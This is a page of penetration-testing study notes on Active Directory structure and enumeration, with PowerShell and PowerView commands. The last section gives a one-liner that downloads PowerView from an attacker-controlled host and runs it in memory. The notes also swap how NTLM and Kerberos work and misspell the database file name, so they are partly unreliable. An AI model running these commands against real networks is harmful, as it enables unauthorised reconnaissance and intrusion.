whx
/
killchain-compendium
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity
killchain-compendium/misc/active_directory/active_directory.md

2.9 KiB
Raw Blame History

Active Directory Enumeration

  • Consists of

    • Domain Controller
    • Organizational Units
      • Users
      • Groups
    • Trusts
    • AD Domains
    • AD Forest
    • Policies

  • Administrative accounts are

    • Domain Admin
    • Enterprise Admin
    • Schema Admin
    • Server Operator
    • Account Operator

Domain Controller

  • AD Domain Services data store
  • Authentication and authorization
  • Update replication / sync with other domain controllers in the forest
  • Administration of domain resources

AD DS Store

  • Database of directory info such as users, groups and services
    • ntdis.dit contains the information, including password hashes
    • SystemRoot%\NTDS

Forest

  • Trees, hierarchy of domains in the AD Domain Services
  • Domains, groups of objects
  • Organizational Units (OU), containers of objects such as groups, users, printers and other resources
  • Trusts, allows users to access resources in a different domain
  • Objects users, groups, printers, computers or shares
  • Domain Services, DNS, LLMNR, SMB
  • Domain Schema, Rules for object creation

Users

  • Domain Admin, DC access
  • Server Accounts, service maintenance, may have admin permissions
  • Local Admin, administrative persmission on an object but not the DC
  • Domain Users, average user account on a local machine which may have admin permissions

Policies

  • Rule sets
  • Apply to a domain
  • Enable or disables services on a domain basis, like antivirus and malware scanning
    • Disable Windows Defender
    • Communication signing, e.g. SMB

Domain Services

  • LDAP
  • Certificates handling for services, CRL
  • DNS, LLMNR, NBT-NS

Authentication

  • NTLM, ticket granting service
  • Kerberos, challenge/response via hashes

Usage

  • Cmdlets on Domain Controller

  • Get some help, Get-Help Get-Command -Examples, Get-Command Get-*

  • From ActiveDirectory module

Import-Module Active-Directory
Get-ADDomain | Select-Object NetBIOSName,DNSRoot,InfrastructureMaster
Get-ADForest | Select-Object Domains
Get-ADTrust -Filter * | Select-Object Direction,Source,Target
  • systeminfo | findstr Domain
  • Get-ADUser -filter *
  • Use found CN and DC and specify
  • Get-ADUser -filter * -searchBase "CN=Users,DC=<foundDC>,DC=<domainEnding>"

Powerview Module

Import-Module .\PowerView.ps1
Get-NetDomain
Get-NetDomainController
Get-NetForest
Get-NetDomainTrust

DNS

  • Check ip via ipconfig
  • nslookup, then server <LocalIP> and zone transfer via
ls -d <Domain>

Tips & Tricks

  • Download and execute in one line
powershell -exec bypass -c  "IEX(New-Object Net.WebClient).downloadString('http://%ATTACKER_IP%:8000/PowerVi
ew.ps1'); Get-NetUser | select samaccountname, description"